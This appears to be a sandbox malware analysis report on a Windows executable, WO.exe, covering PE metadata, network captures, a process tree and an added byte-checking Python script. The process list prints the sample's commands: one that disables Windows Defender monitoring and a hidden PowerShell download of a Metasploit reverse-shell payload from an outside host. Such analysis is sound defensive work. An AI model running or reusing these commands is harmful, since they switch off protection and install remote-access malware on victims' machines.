                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....msZ........../....2.`.....................@.............................@....................................................................... ..................................................................................H............................code....Z.......\.................. ..`.text........p.......`.............. ..`.rdata..-K.......L...d..............@..@.pdata..............................@..@.data....#..........................@....rsrc........ ... ..................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\System32\cmd.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:true
                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                            Process:C:\Windows\System32\schtasks.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):256
                                                            Entropy (8bit):3.1204038061804953
                                                            Encrypted:false
                                                            SSDEEP:3:wKPQotEWNFWJOFsF5/19gdAiy/wcA1F/3hiFE:3PXWJOKH/19liyx+HmE
                                                            MD5:68D8BE12488F094D89E38F2DB94084CF
                                                            SHA1:6B9E94D65E99061E28A386B421CBDF38701563F1
                                                            SHA-256:EE84BBD7268F3E8737E118A5AAFF6D0510578FE741763AB164EA9AE26FA49214
                                                            SHA-512:86EEA7D15D31626A3244DC64160895586851E252FE124C300B4269FA68B7EC51775FD8E6CB17F54FB2999A44EE206F776EC7E7C3A9FB12E7D2040FA9B92FF5D5
                                                            Malicious:false
                                                            Preview:..Folder: \..TaskName Next Run Time Status ..======================================== ====================== ===============..RunRedditMinute 23/12/2024 13:56:00 Running ..
                                                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                            Entropy (8bit):6.5063374280780675
                                                            TrID:
                                                            • Win64 Executable GUI (202006/5) 92.64%
                                                            • Win64 Executable (generic) (12005/4) 5.51%
                                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                                            • DOS Executable Generic (2002/1) 0.92%
                                                            • VXD Driver (31/22) 0.01%
                                                            File name:WO.exe
                                                            File size:129'024 bytes
                                                            MD5:7176b040816932541eb9c2b91d90b29b
                                                            SHA1:137a9c4620366caff2a1d1c297b6ae8c6d28761d
                                                            SHA256:db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95
                                                            SHA512:1332645e8c6b53994b4f3f28b980c1fe646cec1771e77982a85ec4036725f4f2930bd9a45caea8a03b8a8ece0b432955b0d55e09396f5a80fd7c0d2825b0d1de
                                                            SSDEEP:3072:a2sMWkzbJh1qZ9QW69hd1MMdxPe9N9uA0hu9TBfcX011:7bJhs7QW69hd1MMdxPe9N9uA0hu9TBZn
                                                            TLSH:A9C32766B2A4119DDBB181F6D8911706EA7070B11B15A3DB7B7853F21B2B6C68F3C3B0
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....msZ........../....2.`.....................@.............................@.............................................
                                                            Icon Hash:cbf838d8ce73190e
                                                            Entrypoint:0x140001000
                                                            Entrypoint Section:.code
                                                            Digitally signed:false
                                                            Imagebase:0x140000000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
                                                            DLL Characteristics:
                                                            Time Stamp:0x5A736DDC [Thu Feb 1 19:43:24 2018 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:7182b1ea6f92adbf459a2c65d8d4dd9e
                                                            Instruction
                                                            dec eax
                                                            sub esp, 28h
                                                            dec ecx
                                                            mov eax, 00000160h
                                                            dec eax
                                                            xor edx, edx
                                                            dec eax
                                                            mov ecx, 40020444h
                                                            add dword ptr [eax], eax
                                                            add byte ptr [eax], al
                                                            call 00007F5688EEC058h
                                                            dec eax
                                                            xor ecx, ecx
                                                            call 00007F5688EEC056h
                                                            dec eax
                                                            mov dword ptr [0001F420h], eax
                                                            dec ebp
                                                            xor eax, eax
                                                            dec eax
                                                            mov edx, 00001000h
                                                            dec eax
                                                            xor ecx, ecx
                                                            call 00007F5688EEC043h
                                                            dec eax
                                                            mov dword ptr [0001F3FFh], eax
                                                            dec eax
                                                            mov eax, 4001F088h
                                                            add dword ptr [eax], eax
                                                            add byte ptr [eax], al
                                                            dec eax
                                                            mov dword ptr [0001F43Eh], eax
                                                            call 00007F5688EF707Ah
                                                            call 00007F5688EF6D09h
                                                            call 00007F5688EF2E30h
                                                            call 00007F5688EF2423h
                                                            call 00007F5688EF1CB2h
                                                            call 00007F5688EF1981h
                                                            call 00007F5688EF1078h
                                                            call 00007F5688EF052Fh
                                                            call 00007F5688EEC152h
                                                            call 00007F5688EF5015h
                                                            call 00007F5688EF3874h
                                                            dec eax
                                                            mov edx, 4001F02Ah
                                                            add dword ptr [eax], eax
                                                            add byte ptr [eax], al
                                                            dec eax
                                                            lea ecx, dword ptr [0001F3C6h]
                                                            call 00007F5688EF70A2h
                                                            dec eax
                                                            mov ecx, FFFFFFF5h
                                                            Name | Virtual Address | Virtual Size | Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1f198 | 0xc8 | .data
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x22000 | 0x1ff0 | .rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x1d000 | 0x10c8 | .pdata
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_IAT | 0x1f6a8 | 0x448 | .data
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                            .code | 0x1000 | 0x5a99 | 0x5c00 | 1d0c9527ee8a05d865534bbee542e47e | False | 0.364937160326087 | data | 5.471300917234666 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .text | 0x7000 | 0x102c5 | 0x10400 | 6e20cd0789b9aa50422f27883fd5e9bc | False | 0.4876201923076923 | data | 6.333951903059359 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata | 0x18000 | 0x4b2d | 0x4c00 | 5adef60093ee71127f4e613fda5f050f | False | 0.6623149671052632 | VAX-order 68k Blit mpx/mux executable | 6.662073317603483 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .pdata | 0x1d000 | 0x10c8 | 0x1200 | 415f7b43ac6a86ff843649544b818973 | False | 0.466796875 | data | 4.88380909718978 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data | 0x1f000 | 0x2318 | 0x1600 | 3b35fef9f8efd11d0fd11c512f35d665 | False | 0.32865767045454547 | data | 4.299905086985605 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc | 0x22000 | 0x1ff0 | 0x2000 | 1e818fbf0d62bea6c3bd7fe5db2069e6 | False | 0.62890625 | data | 6.361691675494712 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                            RT_ICON | 0x222ac | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | | | 0.3942307692307692
                                                            RT_RCDATA | 0x23354 | 0x9c7 | data | | | 1.0043947263284059
                                                            RT_RCDATA | 0x23d1c | 0xe | zlib compressed data | | | 1.5714285714285714
                                                            RT_RCDATA | 0x23d2c | 0x1 | very short file (no magic) | | | 9.0
                                                            RT_RCDATA | 0x23d30 | 0x9 | data | | | 1.8888888888888888
                                                            RT_GROUP_ICON | 0x23d3c | 0x14 | data | | | 1.1
                                                            RT_MANIFEST | 0x23d50 | 0x2a0 | XML 1.0 document, ASCII text, with very long lines (672), with no line terminators | | | 0.5520833333333334
                                                            DLL | Import
                                                            msvcrt.dll | memset, wcsncmp, memmove, wcsncpy, wcsstr, _wcsnicmp, _wcsdup, free, _wcsicmp, wcslen, wcscpy, wcscmp, memcpy, tolower, wcscat, malloc
                                                            KERNEL32.dll | GetModuleHandleW, HeapCreate, GetStdHandle, HeapDestroy, ExitProcess, WriteFile, GetTempFileNameW, LoadLibraryExW, EnumResourceTypesW, FreeLibrary, RemoveDirectoryW, GetExitCodeProcess, EnumResourceNamesW, GetCommandLineW, LoadResource, SizeofResource, FreeResource, FindResourceW, GetShortPathNameW, GetSystemDirectoryW, EnterCriticalSection, CloseHandle, LeaveCriticalSection, InitializeCriticalSection, WaitForSingleObject, TerminateThread, CreateThread, Sleep, WideCharToMultiByte, HeapAlloc, HeapFree, LoadLibraryW, GetProcAddress, GetCurrentProcessId, GetCurrentThreadId, GetModuleFileNameW, GetEnvironmentVariableW, SetEnvironmentVariableW, GetCurrentProcess, TerminateProcess, RtlLookupFunctionEntry, RtlVirtualUnwind, RemoveVectoredExceptionHandler, AddVectoredExceptionHandler, HeapSize, MultiByteToWideChar, CreateDirectoryW, SetFileAttributesW, GetTempPathW, DeleteFileW, GetCurrentDirectoryW, SetCurrentDirectoryW, CreateFileW, SetFilePointer, TlsFree, TlsGetValue, TlsSetValue, TlsAlloc, HeapReAlloc, DeleteCriticalSection, GetLastError, SetLastError, UnregisterWait, GetCurrentThread, DuplicateHandle, RegisterWaitForSingleObject
                                                            SHELL32.DLL | ShellExecuteExW, SHGetFolderLocation, SHGetPathFromIDListW
                                                            WINMM.DLL | timeBeginPeriod
                                                            OLE32.DLL | CoInitialize, CoTaskMemFree
                                                            SHLWAPI.DLL | PathAddBackslashW, PathRenameExtensionW, PathQuoteSpacesW, PathRemoveArgsW, PathRemoveBackslashW
                                                            USER32.DLL | CharUpperW, CharLowerW, MessageBoxW, DefWindowProcW, GetWindowLongPtrW, GetWindowTextLengthW, GetWindowTextW, EnableWindow, DestroyWindow, UnregisterClassW, LoadIconW, LoadCursorW, RegisterClassExW, IsWindowEnabled, GetSystemMetrics, CreateWindowExW, SetWindowLongPtrW, SendMessageW, SetFocus, CreateAcceleratorTableW, SetForegroundWindow, BringWindowToTop, GetMessageW, TranslateAcceleratorW, TranslateMessage, DispatchMessageW, DestroyAcceleratorTable, PostMessageW, GetForegroundWindow, GetWindowThreadProcessId, IsWindowVisible, EnumWindows, SetWindowPos
                                                            GDI32.DLL | GetStockObject
                                                            COMCTL32.DLL | InitCommonControlsEx
                                                            Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                            2024-12-23T19:54:05.154586+0100 | 2820208 | ETPRO MALWARE Possible Metasploit Payload (AB Template PDB) | 1 | 185.151.51.214 | 443 | 192.168.2.4 | 49730 | TCP
                                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                            Dec 23, 2024 19:54:01.633519888 CET | 62472 | 53 | 192.168.2.4 | 1.1.1.1
                                                            Dec 23, 2024 19:54:02.002512932 CET | 53 | 62472 | 1.1.1.1 | 192.168.2.4
                                                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                            Dec 23, 2024 19:54:01.633519888 CET | 192.168.2.4 | 1.1.1.1 | 0xb3c4 | Standard query (0) | f.neko.pe | A (IP address) | IN (0x0001) | false
                                                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                            Dec 23, 2024 19:54:02.002512932 CET | 1.1.1.1 | 192.168.2.4 | 0xb3c4 | No error (0) | f.neko.pe | | 185.151.51.214 | A (IP address) | IN (0x0001) | false
                                                            • f.neko.pe
                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            0 | 192.168.2.4 | 49730 | 185.151.51.214 | 443 | 2316 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-12-23 18:54:03 UTC | 88 | OUT | GET /file/~d35Ci~adCQqRGWGduhs.exe HTTP/1.1
                                                            Host: f.neko.pe
                                                            Connection: Keep-Alive
                                                            2024-12-23 18:54:04 UTC | 428 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 23 Dec 2024 18:54:04 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 73802
                                                            Connection: close
                                                            X-Powered-By: Express
                                                            Content-Disposition: filename="reddit.exe"
                                                            Access-Control-Allow-Origin: *
                                                            Accept-Ranges: bytes
                                                            Cache-Control: public, max-age=0
                                                            Last-Modified: Wed, 18 Dec 2024 02:39:39 GMT
                                                            ETag: W/"1204a-193d7a2a17c"
                                                            Strict-Transport-Security: max-age=31536000
                                                            2024-12-23 18:54:04 UTC15956INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 93 38 f0 d6 d7 59 9e 85 d7 59 9e 85 d7 59 9e 85 ac 45 92 85 d3 59 9e 85 54 45 90 85 de 59 9e 85 b8 46 94 85 dc 59 9e 85 b8 46 9a 85 d4 59 9e 85 d7 59 9f 85 1e 59 9e 85 54 51 c3 85 df 59 9e 85 83 7a ae 85 ff 59 9e 85 10 5f 98 85 d6 59 9e 85 52 69 63 68 d7 59 9e 85 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 b4 35 45 4a 00 00 00 00 00 00 00 00 e0 00 0f
                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8YYYEYTEYFYFYYYTQYzY_YRichYPEL5EJ
                                                            2024-12-23 18:54:04 UTC16384INData Raw: 00 8d 73 20 68 2b e8 40 00 56 ff d7 83 c4 3a 89 45 f8 85 c0 06 85 85 00 00 00 68 b4 df 40 00 56 ff d7 83 c4 08 24 45 f8 85 c0 c7 45 f0 02 00 ef 00 75 6c 8b 45 ec 85 c0 0f 85 05 04 00 00 a1 f8 17 71 6f 8b 94 04 8d 55 d8 c7 45 dc 01 00 00 00 52 c8 89 70 ce e8 52 6a 73 00 8b 4b 04 51 e8 59 f4 00 00 8b 15 d0 02 41 00 a1 b8 02 41 00 ca 89 15 d7 02 f4 00 22 d0 40 83 fa fb a3 b8 02 3b 00 7e 0d 68 b2 d2 42 00 b2 70 d8 3e ff a9 c4 04 53 e8 77 f9 22 ff 83 c4 04 3c fb e9 c8 c5 00 00 cd 0b 02 41 00 4f f9 75 2e 0c e0 e8 40 00 2c ff d7 83 c4 b9 ba 53 05 cf 00 b6 c0 74 17 8a 48 08 e9 c0 08 80 f9 20 7e 6b 88 0a 8a 48 01 42 40 80 f9 20 7f f4 c6 02 00 68 6c 14 40 00 c2 f5 3d 8b 0f 83 c4 13 4d d2 c0 36 64 fa 01 c9 ff f2 c0 f2 ee f7 d1 49 83 f9 09 76 1f 83 38 09 6a f2 75 45
                                                            Data Ascii: s h+@V:Eh@V$EEulEqoUERpRjsKQYAA"@;~hBp>Sw"<AOu.@,StH ~kHB@ hl@=M6dIv8juE
                                                            2024-12-23 18:54:05 UTC16384INData Raw: 0e 46 40 db 75 fe c6 06 65 46 85 db 7d 07 f7 db 50 06 2d eb 71 c6 06 5c 8b c3 b9 64 00 65 00 7b f7 f9 46 85 c0 8b fa 7e 73 04 30 88 f3 46 8b c3 b9 0a a4 00 09 1f f7 f9 84 c0 8b ca 7e 17 b8 67 66 42 66 03 ef c1 fa 02 07 c2 c1 81 1f 3c d0 80 c2 30 88 16 46 80 c1 30 88 0e d0 59 44 ff ff 7a c2 ff 06 4b 5f 5e 8b 1c 5d c3 90 90 55 8b ec 8b 3c 1c fc 4d 18 8b 55 14 50 8b 45 10 6a ce 51 8b 4d 0c 52 8b 55 08 50 51 52 e8 0e c1 00 00 80 81 1c 5d c3 90 90 de 90 d9 90 22 90 90 55 8b ec 9e ec 14 4f 22 10 4b 7c 07 c7 45 10 4e 00 00 00 df 97 42 98 1d 30 c2 5b 00 8b 16 18 75 8b 5d 20 19 33 f6 57 e6 af 89 75 fc 89 31 f6 f1 05 eb fb 7a 0e 80 45 23 d9 e0 dd 5d 08 c7 01 01 00 00 00 8b 4d 0c 8b ac 08 8d 45 ec 50 51 52 ff 15 18 b0 40 00 dd 5d 08 dd 45 ec dc 1d 30 c2 40 3a 83 c4
                                                            Data Ascii: F@ueF}P-q\de{F~s0F~gfBf<0F0YDzK_^]U<MUPEjQMRUPQR]"UO"K|ENB0[u] 3Wu1zE#]MEPQR@]E0@:
                                                            2024-12-23 18:54:05 UTC16384INData Raw: 00 00 f1 00 00 4d 00 00 00 00 00 00 f0 00 00 00 00 00 28 00 de 03 00 a2 00 00 8a 00 00 00 00 00 00 00 00 00 00 00 7b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 23 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 65 00 11 eb 00 00 00 00 00 00 00 00 00 e9 76 cc 00 00 00 00 75 20 00 00 00 00 00 00 fb 00 00 00 00 00 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 74 00 00 00 00 00 41 00 f7 00 00 e5 00 00 00 00 00 58 33 00 00 98 00 00 00 6e 00 a6 00 00 81 00 00 00 00 b2 00 00 00 00 00 00 00 00 0d 00 00 13 00 00 00 00 00 00 00 00 00 c7 00 00 00 00 00 00 00 7a 35 00 00 00 9c 00 00 00 00 00 8f 89 00 00 00 00 00 00 00 36 00 00 00 00 00 00 00 00 00 00 00 00 20 00 b9 b5 00 00 f2 b7 00 00 00 00 00 00
                                                            Data Ascii: M({#evu tAX3nz56
                                                            2024-12-23 18:54:05 UTC8694INData Raw: 54 68 65 20 73 70 65 63 69 66 69 65 64 20 49 50 20 61 64 64 72 65 73 73 20 69 73 20 69 6e 76 61 6c 69 64 2e 00 00 00 00 44 53 4f 20 6c 6f 61 64 20 66 61 69 6c 65 64 00 4e 6f 20 73 68 61 72 65 64 20 6d 65 6d 6f 72 79 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 61 76 61 69 6c 61 62 6c 65 00 4e 6f 20 74 68 72 65 61 64 20 6b 65 79 20 73 74 72 75 63 74 75 72 65 20 77 61 73 20 70 72 6f 76 69 64 65 64 20 61 6e 64 20 6f 6e 65 20 77 61 73 20 72 65 71 75 69 72 65 64 2e 00 00 4e 6f 20 74 68 72 65 61 64 20 77 61 73 20 70 72 6f 76 69 64 65 64 20 61 6e 64 20 6f 6e 65 20 77 61 73 20 72 65 71 75 69 72 65 64 2e 00 00 00 00 4e 6f 20 73 6f 63 6b 65 74 20 77 61 73 20 70 72 6f 76 69 64 65 64 20 61 6e 64 20 6f 6e 65 20 77 61 73 20 72 65 71 75 69 72 65 64 2e 00 00 00 00 4e 6f 20
                                                            Data Ascii: The specified IP address is invalid.DSO load failedNo shared memory is currently availableNo thread key structure was provided and one was required.No thread was provided and one was required.No socket was provided and one was required.No
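Two things in the stream above are worth re-checking by hand before trusting the rest of the report: whether the captured IN chunks actually add up to the advertised Content-Length (a truncated capture would make the dropped file's hash meaningless), and what the first bytes say about the binary that powershell.exe wrote to Temp\reddit.exe. The script below is an added example and not part of the Joe Sandbox report. The header block, the five chunk sizes and the first 255 body bytes are copied from the stream as shown; nothing past those bytes is available, so the COFF Characteristics field (which would start at byte 255) is deliberately not read.

```python
"""Re-verify the f.neko.pe download transcribed in the HTTP stream above.
Added example; header values, chunk sizes and body bytes are copied from the report."""
import re
import struct
from datetime import datetime, timezone

# Response header block exactly as shown in the stream.
RESPONSE_HEADERS = """HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 18:54:04 GMT
Content-Type: application/octet-stream
Content-Length: 73802
Connection: close
X-Powered-By: Express
Content-Disposition: filename="reddit.exe"
"""

# "Bytes transferred" of the five IN data rows that follow the headers.
IN_CHUNK_SIZES = (15956, 16384, 16384, 16384, 8694)

# First 255 bytes of the first IN chunk, re-laid out in 16-byte rows so the
# offsets used below (0x3C for e_lfanew, 0x80 for the Rich header, 0xE8 for "PE")
# can be checked by eye against the dump.
FIRST_BYTES = bytes.fromhex("""
4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00
b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00
0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68
69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f
74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20
6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
93 38 f0 d6 d7 59 9e 85 d7 59 9e 85 d7 59 9e 85
ac 45 92 85 d3 59 9e 85 54 45 90 85 de 59 9e 85
b8 46 94 85 dc 59 9e 85 b8 46 9a 85 d4 59 9e 85
d7 59 9f 85 1e 59 9e 85 54 51 c3 85 df 59 9e 85
83 7a ae 85 ff 59 9e 85 10 5f 98 85 d6 59 9e 85
52 69 63 68 d7 59 9e 85 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00
b4 35 45 4a 00 00 00 00 00 00 00 00 e0 00 0f
""")

# IMAGE_FILE_MACHINE_* constants from the PE specification.
MACHINE_NAMES = {0x14C: "x86", 0x8664: "x64", 0x1C0: "ARM", 0xAA64: "ARM64"}


def parse_headers(raw: str) -> dict:
    """Map lower-cased header names to values; the status line is skipped."""
    headers = {}
    for line in raw.strip().splitlines()[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def disposition_filename(headers: dict):
    """Filename the server asked the client to use (the name the dropped file got)."""
    m = re.search(r'filename="?([^";]+)"?', headers.get("content-disposition", ""))
    return m.group(1) if m else None


def body_is_complete(headers: dict, chunk_sizes) -> bool:
    """True when the captured IN chunks account for the whole Content-Length."""
    return int(headers["content-length"]) == sum(chunk_sizes)


def pe_summary(data: bytes) -> dict:
    """Follow e_lfanew from the DOS header to the PE signature and read the COFF header
    fields that fit inside the captured bytes (Characteristics does not, so it is skipped)."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError(f"no PE signature at e_lfanew=0x{e_lfanew:x}")
    machine, sections, stamp, _sym_ptr, _sym_count, opt_size = struct.unpack_from(
        "<HHIIIH", data, e_lfanew + 4)
    return {
        "e_lfanew": e_lfanew,
        "machine": machine,
        "arch": MACHINE_NAMES.get(machine, f"unknown (0x{machine:x})"),
        "sections": sections,
        "link_time": datetime.fromtimestamp(stamp, tz=timezone.utc),
        "optional_header_size": opt_size,
        # MSVC-linked images carry a Rich header between the DOS stub and "PE\0\0".
        "has_rich_header": b"Rich" in data[0x40:e_lfanew],
    }


if __name__ == "__main__":
    h = parse_headers(RESPONSE_HEADERS)
    print("filename:", disposition_filename(h),
          "| body complete:", body_is_complete(h, IN_CHUNK_SIZES))
    for key, value in pe_summary(FIRST_BYTES).items():
        print(f"{key:>22}: {value}")
```

The chunk sizes sum to exactly 73802, so the capture is complete and the hash of the dropped file in the process list can be trusted. The COFF header reports machine 0x14c (x86) with a 0xE0-byte optional header, which is the PE32 layout; that agrees with the process list, where reddit.exe runs as a WOW64 (32-bit) process at image base 0x400000.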



                                                            Target ID:0
                                                            Start time:13:53:55
                                                            Start date:23/12/2024
                                                            Path:C:\Users\user\Desktop\WO.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\Desktop\WO.exe"
                                                            Imagebase:0x140000000
                                                            File size:129'024 bytes
                                                            MD5 hash:7176B040816932541EB9C2B91D90B29B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:1
                                                            Start time:13:53:55
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat C:\Users\user\Desktop\WO.exe"
                                                            Imagebase:0x7ff7899b0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:13:53:55
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:13:53:55
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:13:53:59
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:13:54:03
                                                            Start date:23/12/2024
                                                            Path:C:\Users\user\AppData\Local\Temp\reddit.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Local\Temp\reddit.exe"
                                                            Imagebase:0x400000
                                                            File size:73'802 bytes
                                                            MD5 hash:23544090C6D379E3ECA7343C4F05D4D2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000006.00000002.2895821708.0000000000690000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: 00000006.00000002.2895821708.0000000000690000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000006.00000002.2895574683.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
